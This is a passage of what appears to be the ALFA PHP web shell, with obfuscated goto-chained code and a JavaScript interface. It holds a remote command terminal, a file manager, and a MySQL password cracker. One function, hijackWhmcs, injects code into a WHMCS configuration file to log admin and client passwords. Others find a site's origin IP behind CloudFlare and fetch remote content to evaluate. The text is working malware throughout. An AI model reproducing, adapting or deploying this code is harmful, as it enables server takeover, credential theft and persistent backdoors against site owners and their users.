alfaTerminalChangecolor(e,t){d.querySelector("#"+t+" pre.ml1").style.color=e.value,setCookie("alfa-terminal-color",e.value,2012)}function alfaGetTerminalHistory(e){var t=getCookie("alfa-terminal-history");try{t=atob(t),t=JSON.parse(t)}catch(e){t=[]}return void 0!==e&&t.reverse(),t}function changeTerminalFontSize(e,t){var a=d.querySelector("#"+e+" pre.ml1"),i=parseInt(window.getComputedStyle(a,null).getPropertyValue("font-size")),l="";1==t?(l=i+1+"px",a.style.fontSize=l):(l=i-1+"px",a.style.fontSize=l),setCookie("alfa-terminal-fontsize",l,2012)}function alfaWalkInTerminalHistory(e,t,a){var i=t||window.event;if("38"==i.keyCode||"40"==i.keyCode||"37"==i.keyCode||"39"==i.keyCode)switch(i.keyCode){case 38:var l=alfaGetTerminalHistory(!0),r="";0==terminal_walk_index[a].index?(0==terminal_walk_index[a].key&&++terminal_walk_index[a].index,void 0!==(r=l[terminal_walk_index[a].index])?(e.value=r,++terminal_walk_index[a].index):(e.value="",terminal_walk_index[a].index=0)):terminal_walk_index[a].index<l.length&&(0==terminal_walk_index[a].key&&++terminal_walk_index[a].index,e.value=l[terminal_walk_index[a].index],++terminal_walk_index[a].index),terminal_walk_index[a].key=1;break;case 40:l=alfaGetTerminalHistory(!0);if(terminal_walk_index[a].index>=0)0!=terminal_walk_index[a].index&&(--terminal_walk_index[a].index,1==terminal_walk_index[a].key&&--terminal_walk_index[a].index),void 0!==(r=l[terminal_walk_index[a].index])?e.value=r:(e.value="",terminal_walk_index[a].index=0);terminal_walk_index[a].key=0;break;default:console.log(i.keyCode)}else terminal_walk_index[a].index=0}function clearTerminalHistory(){d.querySelectorAll(".commands-history").forEach(function(e){e.innerHTML=""}),setCookie("alfa-terminal-history","",2012)}function alfaAceToFullscreen(e){var t=e.getAttribute("ace_id");alfa_ace_editors.editor[t].container.requestFullscreen()}function closeHistoryCmd(e,t){if("free"==e){var a=t.getAttribute("term_id");return e=d.querySelector("#"+a+" .cmd-history-icon"),d.querySelector("#"+a+" .cmd-history-holder").style.visibility="hidden",d.querySelector("#"+a+" .cmd-history-holder").style.opacity="0",e.setAttribute("mode","off"),!1}var i=e.getAttribute("mode"),l=(a=e.getAttribute("term_id"),d.querySelector("#"+a+" .cmd-history-holder"));0==i.length||"off"==i?(l.style.visibility="visible",l.style.opacity="1",e.setAttribute("mode","on")):(l.style.visibility="hidden",l.style.opacity="0",e.setAttribute("mode","off"))}function geEvalAceValue(e){var t=e.querySelector(".php-evals-ace").getAttribute("id");return alfa_ace_editors.eval[t].getValue()}function alfaOpenArchive(e){var t=e.getAttribute("path"),a=e.getAttribute("fname"),i=e.getAttribute("base_id");if(".."==a&&"phar://"!=t.substr(0,7))return!1;var l="a="+alfab64("open_archive_dir")+"&c="+alfab64(c_)+"&alfa1="+alfab64(t)+"&alfa2="+alfab64(i)+"&ajax="+alfab64("true");_Ajax(d.URL,l,function(e){if("0"!=e){$("archive_base_"+i).innerHTML=e;var a=$("archive_dir_"+i).getAttribute("archive_name"),l=$("archive_dir_"+i).getAttribute("archive_full"),r="",o="";if(0!=(t=t.split(a)[1]).length){var n=(t=t.split("/")).length-1;for(var s in 0==t[n].length&&t.splice(n,1),t)0!=t.length&&(o+=t[s]+"/",r+='<a base_id="'+i+'" fname="'+t[s]+'" path="'+l+o+'" onclick="alfaOpenArchive(this);">'+t[s]+"/</a>")}d.querySelector("#archive_dir_"+i+" .archive_pwd_holder").innerHTML=r}},!1,"open_archive_dir")}function alfaDeleteConnectToDb(e){d.querySelectorAll(".dbh_"+e).forEach(function(e){e.remove()}),alfaConnectionHistoryUpdate(e)}function alfaConnectToDb(e,t){var a={};try{a=JSON.parse(atob(getCookie("alfa_connection_hist")))}catch(e){}var i=d.querySelector("#"+t+" div.sf");i.querySelector("input[name=sql_host]").value=a[e].host,i.querySelector("input[name=sql_login]").value=a[e].user,i.querySelector("input[name=sql_pass]").value=a[e].pass,(i.querySelector("input[name=sql_base]")?i.querySelector("input[name=sql_base]"):i.querySelector("select[name=sql_base]")).value=a[e].db,i.querySelector("input[name=sql_count]").checked=!0,d.querySelector("#"+t+" div.sf .db-connect-btn").click()}function alfaShowConnectionHistory(e){var t={},a=e.getAttribute("db_id"),i=e.getAttribute("mode");if(rows='<table class="connection-hist-table"><tr><th>*</th><th>Host</th><th>User</th><th>Pass</th><th>Database</th><th>Connect</th><th>Delete</th></tr>',"on"==i){e.setAttribute("mode","off");try{t=JSON.parse(atob(getCookie("alfa_connection_hist")))}catch(e){}var l,r=1;for(l in t){var o=t[l].user+"_"+t[l].db;rows+='<tr class="dbh_'+o+'"><th>'+r+"</th><th>"+t[l].host+"</th><th>"+t[l].user+"</th><th>"+t[l].pass+"</th><th>"+t[l].db+'</th><th><button style="margin: unset;" class="connection-his-btn" onclick=\'alfaConnectToDb("'+o+'","'+a+'");\'>Connect</button></th><th style="text-align: center;"><button style="margin: unset;" class="connection-his-btn connection-delete" onclick=\'alfaDeleteConnectToDb("'+o+"\");'>X</button></th></tr>",r++}rows+="</table"}else e.setAttribute("mode","on"),rows="";d.querySelector("#"+a+" .connection_history_holder").innerHTML=rows}function alfaConnectionHistoryUpdate(e){var t,a={};try{a=JSON.parse(atob(getCookie("alfa_connection_hist")))}catch(e){}for(t in mysql_cache)0!=mysql_cache[t].db.length&&(a[mysql_cache[t].user+"_"+mysql_cache[t].db]=mysql_cache[t]);void 0!==e&&delete a[e],setCookie("alfa_connection_hist",btoa(JSON.stringify(a)),2012)}function alfaExecTerminal(e,t){var a="";if(0==(a=void 0!==t?"cd "+c_:e.c.value).length)return!1;"l"==a?a="ls -trh --color":"ll"==a&&(a="ls -ltrh --color");var i=e.getAttribute("term_id");alfaloader(i,"block"),closeHistoryCmd("free",e);var l="";"FORM"==e.tagName&&(l=e.querySelector(".php-terminal-current-dir").innerHTML),0==(l=l.trim()).length&&(l=c_);var r="a="+alfab64("terminalExec")+"&c="+alfab64(l)+"&alfa1="+alfab64(a)+"&ajax="+alfab64("true");if(_Ajax(d.URL,r,function(e,t){alfaloader(t,"none");try{var a=$("tab_"+i);null!=a&&((-1==a.classList.value.indexOf("active-terminal-tab")||cgi_is_minimized)&&(a.classList.add("tab-is-done"),alfaShowNotification("proccess is done...",a.innerText)),cgi_is_minimized&&alfaUpdateOptionsBadge("cgiloader"))}catch(e){}e=JSON.parse(e),d.querySelector("#"+t+" .php-terminal-output > pre").innerHTML=e.output,0!=e.path.length&&(d.querySelector("#"+t+" .php-terminal-current-dir").innerHTML=e.path)},!1,i),void 0===t){d.querySelector("#"+i+" .cmd-history-holder .commands-history").insertAdjacentHTML("afterbegin","<div onclick=\"d.querySelector('#"+i+' .php-terminal-input\').value = this.innerHTML;" class="history-cmd-line">'+a+"</div>");var o=alfaGetTerminalHistory(),n=o.indexOf(a);-1!=n&&o.splice(n,1),o.push(a),setCookie("alfa-terminal-history",btoa(JSON.stringify(o)),2012)}d.querySelector("#"+i+" input.php-terminal-input").focus()}function pageChangedFilesMan(e){var t="filesman_holder_"+alfa_current_fm_id,a=getCookie(t+"_page_number"),i=e.innerText;if("<<"==i){a=d.querySelector("#"+t+" .active-page-number").innerText;if(!((a=parseInt(a))>1))return!1;i=a-1}if(">>"==i){a=d.querySelector("#"+t+" .active-page-number").innerText;a=parseInt(a);var l=d.querySelector("#"+t+" .last-page-number").innerHTML;if(!(a+1<=(l=parseInt(l))))return!1;i=a+1}setCookie(t+"_page_number",i,2012),g("FilesMan",c_)}function alfaColDumperInit(){var e=d.querySelector(".tab_name.tab_is_active").getAttribute("opt_id"),t=d.querySelector("#"+e),a=t.getElementsByClassName("box");for(i=0;i<a.length;i++)a[i].addEventListener("click",function(){null!=this.parentElement.querySelector(".nested")&&(this.parentElement.querySelector(".nested").classList.toggle("active"),this.classList.toggle("check-box"))});var i;a=t.getElementsByClassName("sub-box");for(i=0;i<a.length;i++)a[i].setAttribute("opt_id",e),a[i].addEventListener("click",function(){this.classList.toggle("check-box");var e=this.getAttribute("tbl"),t=this.getAttribute("opt_id");t=t.replace("option_",""),col_dumper_selected_data.hasOwnProperty(t)||(col_dumper_selected_data[t]={}),void 0===col_dumper_selected_data[t][e]&&(col_dumper_selected_data[t][e]=[]);var a=this.innerHTML,i=col_dumper_selected_data[t][e].indexOf(a);-1==i?col_dumper_selected_data[t][e].push(a):col_dumper_selected_data[t][e].splice(i,1)})}function showSymlinkPath(e,t){t.stopPropagation();var a=e.getAttribute("row"),i=$("td_row_"+a),l=e.getAttribute("opt_title"),r=e.getAttribute("fname");if(l=decodeURIComponent(r)+" -> "+l,null!=i){i.insertAdjacentHTML("afterbegin",'<div class="symlink_path" id="link_id_'+a+'">'+l+"</div>");var o=t.clientX,n=t.clientY-30;$("link_id_"+a).style.left=o+"px",$("link_id_"+a).style.top=n+"px"}}function hideSymlinkPath(e,t){t.stopPropagation(),$("link_id_"+e.getAttribute("row")).remove()}function alfagetFlags(){data="a="+alfab64("get_flags")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,function(e){var t=JSON.parse(e);t.hasOwnProperty("server")&&(d.querySelectorAll(".flag-holder")[0].innerHTML='<img draggable="false" title="'+t.server.name+'" src="http://solevisible.com/images/flags/48/'+t.server.code.toLowerCase()+'.png">',d.querySelectorAll(".flag-holder")[0].style.display="inline"),t.hasOwnProperty("client")&&(d.querySelectorAll(".flag-holder")[1].innerHTML='<img draggable="false" title="'+t.client.name+'" src="http://solevisible.com/images/flags/48/'+t.client.code.toLowerCase()+'.png">',d.querySelectorAll(".flag-holder")[1].style.display="inline")})}function colDumplerSelectType(e){var t=e.options[e.selectedIndex].value;$("coldumper-delimiter-input").style.display="delimiter"==t?"inline-block":"none"}function alfaCheckUrlHash(){var e=window.location.hash.substr(1),t=e.split("&").reduce(function(e,t){var a=t.split("=");return e[a[0]]=a[1],e},{});if(""!=e)switch(t.action){case"fileman":case"options":t.path=decodeURIComponent(t.path),g("FilesMan",t.path,function(e){if(t.hasOwnProperty("file")){var a="auto";isArchive(t.file)&&(a="view"),editor(t.path+"/"+t.file,a,"","","","file")}}),"options"==t.action&&t.hasOwnProperty("opt")&&(alfa_can_add_opt=!0,g(t.opt,null,"","",""),d.querySelector(".opt-title").innerHTML=$("menu_opt_"+t.opt).innerHTML),t.hasOwnProperty("file")||editorClose("editor"),t.hasOwnProperty("opt")||editorClose("options_window"),editorClose("cgiloader");break;default:g("FilesMan","<?php  echo $GLOBALS["cwd"]; ?> 
"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}else g("FilesMan","<?php  echo $GLOBALS["cwd"]; ?> 
"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}function alfaFmngrContextRow(){d.querySelectorAll(".fmanager-row a.main_name").forEach(function(e){e.addEventListener("contextmenu",function(e){var t=e.target,a="";if(".."==(a="A"==e.target.parentElement.tagName?(t=e.target.parentElement).getAttribute("fname"):t.getAttribute("fname")))return!1;var i=t.getAttribute("id"),l=t.getAttribute("path"),r=t.getAttribute("ftype"),o=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete"];for(var n in"file"!=r||isArchive(a)?o[3]="view_archive":o.splice(11,1),"folder"==r&&(o=["newtab","link","move","copy","rename","modify","permission","compress","delete"]),alfaSortMenuItems(o),o){var s=d.querySelector("#rightclick_menu > a[name="+o[n]+"]");switch(s.setAttribute("fid",i),s.setAttribute("fname",decodeURIComponent(a)),s.setAttribute("path",l),s.setAttribute("ftype",r),o[n]){case"view":case"edit":var c="auto";"edit"==o[n]&&(c="edit"),s.setAttribute("href","#action=fileman&path="+c_+"/&file="+a),s.setAttribute("onclick","editor('"+a+"','"+c+"','','','','file')");break;case"newtab":var u=a;"file"==r?(u="&file="+a,s.setAttribute("href","#action=fileman&path="+c_+"/"+u),s.setAttribute("target","_blank"),s.onclick=function(){}):(s.setAttribute("href","javascript:void(0)"),s.removeAttribute("target"),s.onclick=function(){alfaFilesManNewTab(c_,u)});break;case"delete":s.setAttribute("onclick","var chk = confirm('Are You Sure For Delete # "+a+" # ?'); chk ? g('FilesMan',null,'delete', '"+a+"') : '';");break;case"download":s.setAttribute("onclick","g('FilesTools',null,'"+a+"', 'download')");break;case"permission":try{var p=d.querySelector("#id_chmode_"+i.replace("id_","")+" span").innerHTML;s.setAttribute("perm",p.trim())}catch(e){}break;case"link":s.style.display="block";var f="<?php  echo $_SERVER["DOCUMENT_ROOT"]; ?> 
/",m=(c_+"/"+a).replace(/\/\//g,"/");if(-1!=m.indexOf(f)){f=m.replace(f,"");var b=location.origin+"/"+f;s.setAttribute("href",""+b)}else s.style.display="none"}}var y=e.clientX,_=e.clientY;alfaRightClickMenu(y,_),e.preventDefault()})})}function alfaFilesManNewTab(e,t,a){var i=t;void 0!==a&&(i=alfaGetLastFolderName(e));var l=decodeURIComponent(e+"/"+t);l=l.replace(/\/\//g,"/");var r=$("filesman_tab_1"),o=r.getAttribute("fm_counter");o=parseInt(o)+1,r.setAttribute("fm_counter",o),d.querySelector("#filesman_tabs_child").insertAdjacentHTML("beforeend",'<div onmouseover="alfaFilesmanTabShowTitle(this,event);" onmouseout="alfaFilesmanTabHideTitle(this,event);" path="'+l+'" id="filesman_tab_'+o+'" fm_id="'+o+'" onclick="filesmanTabController(this);" fname="'+t+'" class="filesman_tab"><img class="folder-tab-icon" src="http://solevisible.com/icons/menu/folder2.svg"> <span class="filesman-tab-folder-name">'+i+'</span> <img fm_id="'+o+'" onclick="closeFmTab(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),d.querySelector(".ajaxarea").insertAdjacentHTML("beforebegin",'<div style="position:relative;" fm_id="'+o+'" id="filesman_holder_'+o+'" class="ajaxarea"><div class="header"></div></div>'),alfa_fm_id=o,g("FilesMan",l),alfa_fm_id=0}function alfaFilesmanTabShowTitle(e,t){t.stopPropagation();var a=$("filesman-tab-full-path");a.style.display="block",a.style.top=e.offsetTop-37+"px",a.style.left=e.offsetLeft-$("filesman_tabs").scrollLeft+"px",a.innerHTML=e.getAttribute("path")}function alfaFilesmanTabHideTitle(e,t){$("filesman-tab-full-path").style.display="none"}function alfaPopupAction(e,t){var a="",i="";switch(t){case"rename":a="Old file name:",i="New file name:";break;case"copy":a="File path:",i="Enter the file path that you want to copy this file to:";break;case"move":a="Current Path:",i="Enter the file path that you want to move this file to:";break;case"extract":a="Files to extract:",i="Enter the path you wish to extract the files to and click Extract:"}var l=e.getAttribute("fname"),r=e.getAttribute("path"),o=t.charAt(0).toUpperCase()+t.slice(1);if("permission"==t){d.querySelector("#shortcutMenu-holder").style.height="222px",o="Change Permissions",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="block",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="none";var n=e.getAttribute("perm"),s=n.substr(1,1),c=n.substr(2,1),u=n.substr(3,1);d.querySelector("#shortcutMenu-holder > form input[name=u]").value=s,d.querySelector("#shortcutMenu-holder > form input[name=g]").value=c,d.querySelector("#shortcutMenu-holder > form input[name=w]").value=u,autoCheckPerms(s,"u",["u","g","w"]),autoCheckPerms(c,"g"),autoCheckPerms(u,"w")}else d.querySelector("#shortcutMenu-holder").style.height="190px",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="block",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="none";var p="move"==t||"copy"==t?r+l:l;if("modify"==t){var f="tr_row_"+e.getAttribute("fid").replace("id_","");p=d.querySelector("#"+f+" .main_modify").innerText}d.querySelector(".cl-popup-fixed").style.display="block",d.querySelector("#shortcutMenu-holder .popup-head").innerHTML=o,d.querySelector("#shortcutMenu-holder .old-path-lbl").innerHTML=a,d.querySelector("#shortcutMenu-holder .new-filename-lbl").innerHTML=i,d.querySelector("#shortcutMenu-holder .popup-foot > button[name=accept]").innerHTML=o,d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=r+l,d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value=p,d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("fid",e.getAttribute("fid")),d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("action",t)}function calcperm(){var e=event.srcElement;autoCheckPerms(e.checked,e.name.substr(0,1))}function autoCheckPerms(e,t,a){if(void 0!==a)for(var i in a){var l=a[i];d.querySelector("#shortcutMenu-holder > form input[name="+l+"r]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+l+"w]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+l+"x]").checked=!1}var r=d.querySelector("#shortcutMenu-holder > form input[name="+t+"r]"),o=d.querySelector("#shortcutMenu-holder > form input[name="+t+"w]"),n=d.querySelector("#shortcutMenu-holder > form input[name="+t+"x]");if("boolean"!=typeof e)"7"==e?(r.checked=!0,o.checked=!0,n.checked=!0):"4"==e?r.checked=!0:"2"==e?o.checked=!0:"1"==e?n.checked=!0:"6"==e?(r.checked=!0,o.checked=!0):"3"==e?(o.checked=!0,n.checked=!0):"5"==e&&(r.checked=!0,n.checked=!0);else{var s=0;r.checked&&(s+=4),o.checked&&(s+=2),n.checked&&(s+=1),"u"==t?d.querySelector("#shortcutMenu-holder > form input[name=u]").value=s:"g"==t?d.querySelector("#shortcutMenu-holder > form input[name=g]").value=s:"w"==t&&(d.querySelector("#shortcutMenu-holder > form input[name=w]").value=s)}}function gg(e,t,a,i,l,r){var o="filesman_holder_"+alfa_current_fm_id;alfaloader(o,"block"),data="a="+alfab64(e)+"&c="+alfab64(t)+"&alfa1="+alfab64(a)+"&alfa2="+alfab64(i)+"&alfa3="+alfab64(l)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,r,!1,o)}function alfaPopUpDoAction(e){var t=e.getAttribute("action");switch(t){case"rename":case"move":case"copy":var a=e.getAttribute("fid").replace("id_",""),i=$("id_"+a).getAttribute("fname"),l=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value;l=l.trim(),i=i.trim(),gg("doActions",c_,i,l,t,function(e,i){if("rename"==t)if("done"==e){var r=$("id_"+a);updateFileEditor(a,l);var o=r.getAttribute("path")+$("id_"+a).getAttribute("fname");d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=o,r.addEventListener("animationend",function(){r.classList.remove("textEffect")}),r.classList.add("textEffect"),alfaShowNotification("Renamed...","Rename Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification("error...!","Rename Action","error");alfaloader(i,"none")});break;case"permission":var r=d.querySelector("#shortcutMenu-holder > form input[name=u]").value,o=d.querySelector("#shortcutMenu-holder > form input[name=g]").value,n=d.querySelector("#shortcutMenu-holder > form input[name=w]").value;i=(i=d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML).trim();var s=r.trim()+o.trim()+n.trim();gg("doActions",c_,i,s,t,function(e,t){alfaloader(t,"none"),alfaShowNotification(e,"Permission Action"),d.querySelector(".cl-popup-fixed").style.display="none"});break;case"modify":a=e.getAttribute("fid").replace("id_","");var c=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value,u=$("id_"+a).getAttribute("fname");gg("doActions",c_,c,u,t,function(t,a){if("ok"==t){var i="tr_row_"+e.getAttribute("fid").replace("id_","");d.querySelector("#"+i+" .main_modify").innerHTML=c,alfaShowNotification("success...","Modify Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification(t,"Modify Action","error");alfaloader(a,"none")})}}function alfaInitSoratableTab(e){Sortable.create(e,{direction:"horizontal",animation:300,ghostClass:"sortable-ghost",filter:".not-sortable"})}$("search-input").addEventListener("keydown",function(e){setTimeout(function(){var e=$("search-input").value;for(var t in d.getElementsByClassName("history-list")[0].innerHTML="",editor_files)if(-1!=editor_files[t].file.search(e)||""==e){var a=0;t==editor_current_file&&(a=" is_active"),insertToHistory(t,editor_files[t].file,a,editor_files[t].type)}},100)},!1),_Ajax(d.URL,"a="+alfab64("checkupdate"),function(e){if(0!=e.length&&"[]"!=e){var t=JSON.parse(e);if(t.hasOwnProperty("content")){d.body.insertAdjacentHTML("beforeend",t.content);try{evalJS(t.content)}catch(t){}}if(t.hasOwnProperty("copyright")&&($("alfa-copyright").innerHTML=t.copyright),t.hasOwnProperty("solevisible")&&($("alfa_solevisible").innerHTML=t.solevisible),t.hasOwnProperty("code_name")&&($("hidden_sh").innerHTML=t.code_name.replace(/\{version\}/g,t.version_number)),t.hasOwnProperty("market")){var a=d.querySelector("span.alfa_plus");if(t.market.hasOwnProperty("visible")&&"yes"==t.market.visible&&($("menu_opt_market").style.display="inline"),"open"!=t.market.status&&(a.style.color="#ffc107"),t.market.hasOwnProperty("content"))try{evalJS(t.market.content)}catch(t){}}}}),<?php  echo $GLOBALS["need_to_update_header"]; ?> 
?_Ajax(d.URL,"a="+alfab64("updateheader"),function(e){try{var t=JSON.parse(e);for(var a in t){for(var i="",l=0;l<t[a].length;l++)i+="useful"==a||"downloader"==a?'<span class="header_values" style="margin-left: 4px;">'+t[a][l]+"</span>":t[a][l];var r=$("header_"+a);r&&(r.innerHTML=i)}$("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on")}catch(e){}}):islinux&&_Ajax(d.URL,"a="+alfab64("checkcgi"),function(e){"ok"==e&&($("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on"))}),function(){d.onclick=function(){can_hashchange_work=!1,setTimeout(function(){can_hashchange_work=!0},600)},window.onhashchange=function(e){can_hashchange_work&&alfaCheckUrlHash()},alfaCheckUrlHash(),alfagetFlags(),rightclick_menu_context=$("rightclick_menu").style,alfaInitCwdContext(),document.addEventListener("click",function(e){rightclick_menu_context.opacity="0",setTimeout(function(){rightclick_menu_context.visibility="hidden"},501)},!1);var e=document.createElement("script");e.src="https://cdnjs.cloudflare.com/ajax/libs/Sortable/1.10.2/Sortable.min.js",e.id="sortable-plugin",e.onload=function(){alfaInitSoratableTab($("filesman_tabs_child")),alfaInitSoratableTab(d.querySelector(".editor-tabs")),alfaInitSoratableTab(d.querySelector(".options_tab")),alfaInitSoratableTab(d.querySelector(".terminal-tabs")),alfaInitSoratableTab(d.querySelector(".sql-tabs"))},d.body.appendChild(e)}(); 
</script> 
</body> 
</html> 
<?php  } } goto I6J3n; LsgNQ: function alfaget_flags() { $flags = array(); if (function_exists("curl_version")) { $curl = new AlfaCURL(); $server_addr = !@$_SERVER["SERVER_ADDR"] ? function_exists("gethostbyname") ? @gethostbyname($_SERVER["SERVER_NAME"]) : "????" : @$_SERVER["SERVER_ADDR"]; $flag = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $server_addr); $flag2 = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $_SERVER["REMOTE_ADDR"]); if (strpos($flag2, "geoplugin") != false) { $flag = json_decode($flag, true); $flag2 = json_decode($flag2, true); if (!empty($flag["geoplugin_countryCode"])) { $flags["server"]["name"] = $flag["geoplugin_countryName"]; $flags["server"]["code"] = $flag["geoplugin_countryCode"]; } if (!empty($flag2["geoplugin_countryCode"])) { $flags["client"]["name"] = $flag2["geoplugin_countryName"]; $flags["client"]["code"] = $flag2["geoplugin_countryCode"]; } } } echo json_encode($flags); } goto Q03qj; ppnhy: if (!isset($GLOBALS["DB_NAME"]["login_page"])) { die("$GLOBALS['DB_NAME']['login_page']"); } goto TMWW9; XTnlF: function __pre() { return "<pre id="strOutput" style="margin-top:5px" class="ml1">"; } goto KOYJ5; FVVeJ: function alfaSize($s) { if ($s >= 1073741824) { return sprintf("%1.2f", $s / 1073741824) . " GB"; } elseif ($s >= 1048576) { return sprintf("%1.2f", $s / 1048576) . " MB"; } elseif ($s >= 1024) { return sprintf("%1.2f", $s / 1024) . " KB"; } else { return $s . " B"; } } goto dfoFS; fCNwV: function Alfa_Mysql_Cracker($info) { if (@mysqli_connect($info["target"] . ":" . $info["port"], $info["username"], $info["password"])) { CrackerResualt($info); echo "UserName: <font color="red">" . $info["username"] . "</font> PassWord: <font color="red">" . $info["password"] . "</font><font color="green">  Login Success....</font><br>"; } } goto i2b2c; kS5vr: function hijackWhmcs($path, $saveto) { $code = "<?php if(isset($_POST['username']) AND isset($_POST['password']) AND !empty($_POST['username']) AND !empty($_POST['password'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = "{saveto_path}";$alfa_uname = @$_POST['username'];$alfa_pw = @$_POST['password'];if(isset($_POST['language'])){$alfa_q = "SELECT * FROM tbladmins WHERE `username` = '$alfa_uname' AND `password` = '".md5($alfa_pw)."'";$admin = true;}else{$alfa_q = "SELECT * FROM tblclients WHERE `email` = '$alfa_uname'";$admin = false;}$alfa_query = mysqli_query($alfa_connect, $alfa_q);if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(':', $row['password']);$__encPW = md5($__salt[1].$_POST['password']).':'.$__salt[1];if($row['password'] == $__encPW){$allow = true;$row['username'] = $row['email'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row['username'] . ' : ' .  $alfa_pw." (" . $row["email"] . ") : ".($admin ? 'is_admin' : 'is_user')."\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>"; $code = str_replace("{saveto_path}", $saveto, $code); $conf = $path . "/configuration.php"; if (@is_file($conf) and @is_writable($conf)) { $data_conf = @file_get_contents($conf); if (!strstr($data_conf, "?>")) { $code = "?>" . $code; } $evil_conf = $data_conf . "\xa" . $code; @file_put_contents($conf, $evil_conf); hijackOutput(0, $saveto); } else { hijackOutput(1); } } goto qpgQy; kr6dX: function alfacloudflare() { alfahead(); AlfaNum(8, 9, 10, 7, 6, 5, 4, 3); echo "<div class=header><center><br><div class='txtfont_header'>| Cloud Flare ByPasser |</div><br><form action='' onsubmit="g('cloudflare',null,this.url.value,'>>'); return false;" method='post'>
<p><div class='txtfont'>Target:</div> <input type='text' size=30 name='url' style='text-align:center;' placeholder="target.com"> <input type='submit' name='go' value=' ' /></p></form></center>"; if ($_POST["alfa2"] && $_POST["alfa2"] == ">>") { $url = $_POST["alfa1"]; if (!preg_match("/^(https?):\/\/(w{3}|w3)\./i", $url)) { $url = preg_replace("/^(https?):\/\//", '', $url); $url = "http://www." . $url; } $headers = @get_headers($url, 1); $server = $headers["Server"]; $subs = array("owa.", "2tty.", "m.", "gw.", "mx1.", "store.", "1", "2", "vb.", "news.", "download.", "video", "cpanel.", "ftp.", "server1.", "cdn.", "cdn2.", "ns.", "ns3.", "mail.", "webmail.", "direct.", "direct-connect.", "record.", "ssl.", "dns.", "help.", "blog.", "irc.", "forum.", "dl.", "my.", "cp.", "portal.", "kb.", "support.", "search.", "docs.", "files.", "accounts.", "secure.", "register.", "apps.", "beta.", "demo.", "smtp.", "ns2.", "ns1.", "server.", "shop.", "host.", "web.", "cloud.", "api.", "exchange.", "app.", "vps.", "owa.", "sat.", "bbs.", "movie.", "music.", "art.", "fusion.", "maps.", "forums.", "acc.", "cc.", "dev.", "ww42.", "wiki.", "clients.", "client.", "books.", "answers.", "service.", "groups.", "images.", "upload.", "up.", "tube.", "users.", "admin.", "administrator.", "private.", "design.", "whmcs.", "wp.", "wordpress.", "joomla.", "vbulletin.", "test.", "developer.", "panel.", "contact."); if (preg_match("/^(https?):\/\/(w{3}|w3)\./i", $url, $matches)) { if ($matches[2] != "www") { $url = preg_replace("/^(https?):\/\//", '', $url); } else { $url = explode($matches[0], $url); $url = $url[1]; } } if (is_array($server)) { $server = $server[0]; } echo __pre(); if (preg_match("/cloudflare/i", $server)) { echo "\xa[+] CloudFlare detected: {$server}\xa<br>"; } else { echo "
[+] CloudFlare wasn't detected, proceeding anyway.
"; } echo "[+] CloudFlare IP: " . is_ipv4(gethostbyname($url)) . "

<br><br>"; echo "[+] Searching for more IP addresses.\xa\xa<br><br>"; for ($x = 0; $x < count($subs); $x++) { $site = $subs[$x] . $url; $ip = is_ipv4(gethostbyname($site)); if ($ip == "(Null)") { continue; } echo "Trying {$site}: {$ip}
<br>"; } echo "\xa[+] Finished.
<br>"; } echo "</div>"; alfafooter(); } goto SXwEV; GIU6h: function _alfa_fsockopen($server, $uri, $post) { $socket = @fsockopen($server, 80, $errno, $errstr, 15); if ($socket) { $http = "POST {$uri} HTTP/1.0\xd
"; $http .= "Host: {$server}
\xa"; $http .= "User-Agent: " . $_SERVER["HTTP_USER_AGENT"] . "
"; $http .= "Content-Type: application/x-www-form-urlencoded
\xa"; $http .= "Content-length: " . strlen($post) . "
"; $http .= "Connection: close\xd
\xd
"; $http .= $post . "
\xa
"; fwrite($socket, $http); $contents = ''; while (!@feof($socket)) { $contents .= @fgets($socket, 4096); } list($header, $body) = explode("\xd
\xd
", $contents, 2); @fclose($socket); return $body; } else { return ''; } } goto i_y5V; pr1zO: function alfacheckcgi() { if (strlen(alfaEx("id", false, true, true)) > 0) { echo "ok"; } else { echo "no"; } } goto nWc3X; mG6El: $OVpGNqqFZs = "e" . "v" . "al"; goto W1P0Y; TMWW9: if (!isset($GLOBALS["DB_NAME"]["show_icons"])) { die("$GLOBALS['DB_NAME']['show_icons']"); } goto uDSKO; VBrHH: function alfaarchive_manager() { alfahead(); $file = $_POST["alfa2"]; if (!file_exists($file)) { $file = $GLOBALS["cwd"]; } $rand_id = rand(9999, 999999); echo "<div class=header><center><p><div class="txtfont_header">| Archive Manager |</div></p>"; echo "<form name="srch" onSubmit="g('archive_manager',null,null,this.file.value,null,null,'>>');return false;" method='post'>
	<div class="txtfont">
